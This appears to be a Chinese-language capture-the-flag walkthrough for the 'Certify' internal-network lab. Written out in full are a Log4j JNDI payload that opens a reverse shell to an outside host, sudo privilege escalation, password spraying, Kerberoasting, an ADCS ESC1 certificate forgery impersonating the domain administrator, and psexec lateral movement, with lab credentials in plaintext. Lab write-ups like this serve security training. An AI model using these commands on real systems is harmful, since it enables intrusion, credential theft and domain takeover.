春秋云镜-Certify - WP

内网渗透
71

8983端口有一个solr

image-20231010195033084

尝试log4j

http://39.98.127.209:8983/solr/admin/info?d=${jndi:${jndi:ldap://42.192.42.48:1389/Basic/ReverseShell/42.192.42.48/7777}}

sudo提权

 sudo grc --pty /bin/sh

image-20231010204306474

/root/flag下拿到第一个flag

fscan开扫

172.22.9.19(已拿下)172.22.9.7 DC XIAORANG\XIAORANG-DC ADCS172.22.9.47 Windows 6.1
172.22.9.26 DESKTOP-CBKTVMO.xiaorang.lab
172.22.9.47:139 open172.22.9.47:22 open172.22.9.19:80 open172.22.9.19:22 open172.22.9.26:445 open172.22.9.47:445 open172.22.9.7:445 open172.22.9.7:139 open172.22.9.26:139 open172.22.9.26:135 open172.22.9.7:135 open172.22.9.7:80 open172.22.9.47:80 open172.22.9.47:21 open172.22.9.19:8983 open172.22.9.7:88 open

proxychains4 cme smb 172.22.9.7 172.22.9.47 -u '' -p '' --shares

image-20231010205753813

172.22.9.47对fileshare有READ和WRITE权限

image-20231010205913818

拿到第二个flag

给了个提示

Yes, you have enumerated smb. But do you know what an SPN is?

smb里面还有个personal.db

image-20231010210243953

一堆name

同时还有四个密码

image-20231010211118935

尝试先用kerberoasting枚举有效用户名

proxychains4 kerbrute userenum --dc 172.22.9.7  -d xiaorang.lab  username.txt

image-20231010211328741

枚举出了91个有效用户名 然后在用这四个密码进行密码喷洒

proxychains4 -q kerbrute passwordspray --dc 172.22.9.7  -d xiaorang.lab  username.txt adminproxychains4 -q kerbrute passwordspray --dc 172.22.9.7  -d xiaorang.lab  username.txt i9XDE02pLVf.....

得到两个账号

zhangjian@xiaorang.lab:i9XDE02pLVfliupeng@xiaorang.lab:fiAzGwEMgTY

根据提示枚举SPN

proxychains4 -q GetUserSPNs.py -dc-ip 172.22.9.7 'xiaorang.lab/zhangjian:i9XDE02pLVf' -request

image-20231010212426199

hashcat跑密码

image-20231010212605692

跑出

zhangxia MyPass2@@6
chenchen @Passw0rd@

这套环境是有ADCS的

image-20231010223432435

枚举证书

➜ proxychains4 -q certipy find -u "zhangxia@xiaorang.lab" -p 'MyPass2@@6' -dc-ip 172.22.9.7 -vulnerable -stdoutCertipy v4.8.0 - by Oliver Lyak (ly4k)

image-20231010223638012

打ESC1

XR Manager 证书模板伪造域管理员

proxychains4 -q certipy req -u "zhangxia@xiaorang.lab" -p 'MyPass2@@6' -dc-ip 172.22.9.7 -target 172.22.9.7 -ca 'xiaorang-XIAORANG-DC-CA' -template 'XR Manager' -upn 'administrator@xiaorang.lab'

image-20231010224211904

利用证书获取TGT

proxychains4 -q  certipy auth -pfx administrator.pfx -dc-ip 172.22.9.7

image-20231010224329641

横到两台机器上拿下两个flag

export KRB5CCNAME=administrator.ccache

proxychains4 -q psexec.py -no-pass -k xiaorang.lab/Administrator@xiaorang-dc.xiaorang.lab -dc-ip 172.22.9.7

proxychains4 -q psexec.py -no-pass -k xiaorang.lab/Administrator@DESKTOP-CBKTVMO.xiaorang.lab -dc-ip 172.22.9.7